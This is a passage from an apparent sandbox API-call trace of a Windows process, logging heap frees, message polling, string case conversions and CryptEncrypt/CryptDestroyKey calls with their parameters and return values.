hHeap=0x25c0000) returned 1 [0205.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.940] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0205.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34bd838 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0205.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.944] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xb5e0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xb5e8) returned 1 [0205.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.944] CharLowerBuffW (in: lpsz="byte[46568]", cchLength=0xb | out: lpsz="byte[46568]") returned 0xb [0205.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.947] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.947] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.947] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.947] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.947] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.947] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34bd838*, pdwDataLen=0x8bef68*=0xb5e0, dwBufLen=0xb5e8 | out: pbData=0x34bd838*, pdwDataLen=0x8bef68*=0xb5e8) returned 1 [0205.948] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.948] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.948] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.948] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.949] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.949] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.949] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.949] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0205.950] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.950] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0205.950] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.950] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.950] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0205.950] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.950] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0205.950] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.950] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.950] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.950] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.950] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0205.950] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.950] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0205.950] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.950] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.951] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.951] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.951] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.959] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0205.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.959] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0205.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.959] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.959] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0205.959] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.959] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0205.959] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0205.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.959] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0205.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.959] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.960] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0205.960] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0205.960] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0205.960] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0205.960] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0205.960] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0205.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0205.960] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0205.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0205.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0205.960] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0205.960] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0205.961] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0205.962] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0205.962] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0205.962] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.962] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0205.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.962] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0205.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.962] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0205.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.963] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0205.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.963] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.963] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0205.963] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0205.963] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0205.963] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0205.963] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0205.963] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.963] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.963] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.963] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.964] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0205.964] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | 